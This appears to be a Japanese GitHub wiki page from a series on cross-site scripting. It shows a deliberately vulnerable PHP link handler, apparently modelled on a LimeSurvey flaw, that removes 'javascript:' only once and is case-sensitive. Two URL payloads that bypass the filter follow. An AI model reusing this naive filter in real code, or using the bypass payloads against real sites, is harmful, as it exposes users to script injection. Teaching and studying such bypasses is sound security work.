クロスサイトスクリプティング 13 - yujitounai/helloworld GitHub Wiki
javascript:だけ一度取るXSS
Lime Surveyにあったやつ
<div class="box">
<form method="get" action="">enter url
<input name="url" type="text">
<input type="submit">
</form>
</div>
<?php
$url=htmlspecialchars(filter_input(INPUT_GET, 'url'), ENT_QUOTES, 'UTF-8');
$url=str_replace('javascript:', '', $url);
echo "<h1><a href=\"".$url."\">link</a></h1>";
?>?url=Javascript%3Aalert(1)
?url=Javascrjavascript:ipt%3Aalert(1)